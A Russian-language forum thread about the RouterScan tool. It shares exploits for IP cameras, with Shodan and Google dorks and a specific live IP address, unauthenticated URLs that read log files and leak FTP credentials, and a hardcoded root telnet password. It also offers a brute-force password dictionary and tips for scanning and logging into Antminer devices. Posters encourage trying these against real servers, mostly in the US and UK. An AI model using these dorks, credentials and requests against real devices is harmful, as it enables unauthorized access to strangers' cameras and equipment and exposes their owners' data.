"Пользуясь случаем, хочу." (c) Хочу поделится для всех интересующихся, портабельной версией Charles 4.0, описание в архиве: https://yadi.sk/d/oCqBP7os3Rbdch
вы меня сподвигаете на подвиги во имя роутерскана тут натолкнулся недавно на одну железку - ADH-Web Server IP-Cameras. это не просто обычная айпи-камера. целый и довольно интересный сервер (пояснения для принципиальных анти-вуайеристов) ради интереса нашел экслойтик, но нет возможности сейчас его докрутить до удобоваримого для роутерскана состояния. может кто поиграется поплотнее? Spoiler: infa директория / hdd0 /logs позволяет удаленно просматривать произвольные файлы и получить многочисленную информацию через параметр «variable» в скрипте variable.cgi. шодан дорк : ADH-Web /gui/gui_outer_frame.shtml гугл дорк : /gui/gui_outer_frame.shtml можно просто, без поисковых запросов. этот без авторизации пускает в настройки. для изучения файловой структуры 85.189.234.21:8080 пример запроса: http://ip/hdd0/logs/log.txt наиболее интересные файлы bak.txt connect.txt log.txt seclog.log startup.txt DBGLOG.TXT access.txt security.txt проверенные апишники не даю. подвесят страждующие. только в личку (при необходимости) и только binarymaster-у. каждый может сам найти. в гугле их валом. правда не на всех прошивках срабатывает. полное описание эксплойта ( там есть еще реализации) Spoiler: exploit ADH-Web Server IP-Cameras Improper Access Restrictions Vulnerability Details Usually this directory can be protected against unauthenticated access (401 Unauthorized), though, it can access all files directly without requiring authentication.As in the statement below: [401] . 'http://<target_ip>/hdd0/logs' [200] . 'http://<target_ip>/hdd0/logs/log.txt' Most common logfiles: . 'bak.txt . 'connect.txt' . 'log.txt' . 'seclog.log' . 'startup.txt' . 'DBGLOG.TXT' . 'access.txt' . 'security.txt' Impact This could allow a remote attacker to obtain valuable information such as access credentials, Network configuration and other sensitive information in plain text. Another problem identified is an information exposure via the parameter "variable" in variable.cgi script. Knowing some variables can extract a reasonable amount of information. For exemplo: * DNS . 'http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0' * ftp master ftp console credenthials ((the development team said that this credential is not used, then why does it exist?): . ' http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0 ' . ' http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0 ' (although the vast majority of servers have ftp / telnet with anonymous access allowed.) * alarms . 'http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0' * camconfig . 'http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1' (includes, but is not limited to) There are a lot of variables [an audit tool is on the way]. This servers also sends credentials (and other sensitive data) via GET parameters This is poor practice as the URL is liable to be logged in any number of places between the customer and the camera. The credentials should be passed in the body of a POST request (under SSL of course, here is not the case). . (Is possible to create, edit and delete users and other configurations in this way, dangerous) 4. *Vulnerable Products and Packages* . The following products are affected: - SD Advanced Closed IPTV - SD Advanced - EcoSense - Digital Sprite 2 сорри если баян. память последнее время что-то подводить стала в случае чего - удалю пост, дабы не засорять форум. п.с. осторожнее с экспериментами. основная часть найденных мной серверов находится в штатах и грейтбритан . а то опять крику будет, по поводу атак русских хакеров . никто ведь не поймет, что это всего лишь дух творчества и здоровой любознательности
еще один свежий эксплойт на Master IP CAM. дорк не получилось найти. если кто сталкивался-поделитесь для экспериментов. Spoiler: exploit I DESCRIPTION ======================================================================== The Master IP CAM 01 suffers of multiple vulnerabilities: # [CVE-2018-5723] Hardcoded Password for Root Account # [CVE-2018-5724] Unauthenticated Configuration Download and Upload # [CVE-2018-5725] Unauthenticated Configuration Change # [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure II PROOF OF CONCEPT ======================================================================== ## [CVE-2018-5723] Hardcoded Password for Root Account Is possible to access telnet with the hardcoded credential root:cat1029 ## [CVE-2018-5724] Unauthenticated Configuration Download and Upload Download: http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi Upload Form: ### Unauthenticated Configuration Upload <form name="form6" method="post" enctype="multipart/form-data" action="cgi-bin/hi3510/restore.cgi" > <input type="file" name="setting_file" > <input type="submit" value="restore" > </form> ## [CVE-2018-5725] Unauthenticated Configuration Change Change configuration: http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080 List of available commands here: http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf ## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure Retrieve sensitive information: http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser на мой взгляд этот CVE-2018-5726 наиболее интересен, в том числе и для роутерскана.
исправил жаль, что опоздал. а я как-раз шодан-дорк нашел RT_IPC пост с эксплойтом не удаляю. может кому интересно будет самому поиграться... п.с. интересная статья на этот счет http://syrion.me/blog/master-ipcam/
Я задал вопрос, а не делему дураков, форум для того и форум, википедию вам в помощь, Люди воспитанные на сказках про Иванушку-дурачка и Соловья-разбойника не могут быть иными как генетическими склонными к преступлениям и недоразвитыми мозгами,которых следует изолировать от нормального сообщества в целях локализации чумы...
Я повторюсь, можно ли от сканировать или же нет, а если это уже где то выше описано то ткните. вот и все. Спасибо ( а на сказки перешли вы (буратино) как и на личности)
Может кому-то нужно, сделал огромный список паролей для RouterScan, думаю, он содержит почти все дефолтные и часто используемые пароли в сетевых устройствах (роутерах, камерах т.д.), повторов в списке нет, и везде по прописывал <empty>, для пустых полей, чтобы RS понимал. Только если будете использовать такие больше словари, вы таймаут в RS побольше ставьте http://zalil.su/4871484
А вот это в правду не видал, высшая сатира специалистов над попсой. Супер. Спасибо! Ржал как в детстве.
не в тему будь сказано, как раз наоборот. люди воспитанные на сказках про соловья разбойника и иванушку дурачка склонны к творческому мышлению. а вот люди воспитанные на покемонах, халках, бетменах и манге точно "склонны к преступлениям и недоразвитым мозгам". никого лично не имел ввиду. просто уточнение истины ради...
не стоит заморачиваться. на этой ветке форума ранее уже обсуждался вопрос больших словарей по дефолту. пройдитесь по форуму. бесполезное занятие. таймаут не поможет. и в частности, большинство роутеров просто залочится (как одна из причин). для отсутствующих в списке паролей рекомендуется использовать функцию юс крединтиалс. хотя в принципе творческий подход к делу всегда заслуживает уважения...
здесь вам не ответят на этот вопрос. не потому, что не знают, а потому как : Spoiler 1. на этой ветке форума в основном собрались экспериментаторы, а не взломщики. взломами и мелкими пакостями с помощью роутерскана занимаются по большей части скрипткиди, которые "не забывают все галочки выставлять" в роутерскане большинство участников данной ветки такие вещи, как взломы и угоны не одобряют. достаточно просто прочитать посты старожилов, чтобы убедиться в этом. 2.данная ветка форума, одна из самых обсуждаемых на форуме, т.к.роутерскан - один из самых топовых инструментов в нете. и в связи с этим привлекает к себе повышенное внимание не только любознательных участников, но и серьезных дядей в погонах. потому, это не та площадка для такого обсуждения. с такими вопросами вам действительно лучше в даркнете побродить. там обсуждаются взломы банкоматов, банковских серверов, угоны пайпала и майнеров. 3.роутерскан в этом деле не помощник. тут требуются другие инструменты и другой подход. роутерскан - это мощный интеллигентный тестер, но с другими задачами. и никто его не будет подгонять под нужды каждого желающего что-либо взломать или угнать. теперь по теме. антминер работает через стандартный роутер. его подключают как клиента. потому его нужно искать ИМХО только через роутер. уверен, что вы в курсе этого, но на всякий случай https://mining-help.ru/articles/83-nastroika-antminer-s9-i-podklyuchenie.html попробуйте просканировать диапазон портов 3333. пройдитесь по диапазону, к примеру змапом, потом подключайте другие инструменты по найденным айпишникам.и в случае удачи - найдете. если определили - изучите конфиги. стандартный логин-пасс можно взять к примеру в том числе и отсюда https://github.com/bitmaintech/Antm...ghttpd-1.0/www/cgi-bin/minerConfiguration.cgi основной файл minerConfiguration.cgi (к слову по тому-же запросу можете поискать и на шодане). в том-же файле можно поискать и баги ( если дружите с кодингом). во всяком случае эксплойты тоже есть на антминер. наталкивался как-то несколько раз. лень искать. сами сможете найти. но в любом случае для роутерскана ( даже если бы и стоял так вопрос) они не пригодны. там нужно ручками ковырять. но в целом-полностью согласен с Ossen хотя в некотором смысле этот вопрос пересекается с роутерами. так-что это не совсем флуд. тем более, что изначально человеком ставился вопрос о включении антминера в роутерскан в соответствии с вашим предложением так и сделал. надеюсь, что мой ответ (в меру моих, наиболее чем скромных, познаний) вас удовлетворит.
https://miloserdov.org/?p=712 Новая статья про Router Scan v2.60 вышла, хорошо раскрывает потенциал новых фич, понравилась.
тут та же статья только на русском. алексей дублирует свои статьи на английском для западных читателей. оно и правильно....нужно развиваться в ширь, не только в высоту
@sha9 aka Dik Lee зачем пользователей в заблуждение вводишь? Сам то не разобрался... отправляйся читать документацию... (по посту - ответил на том форуме)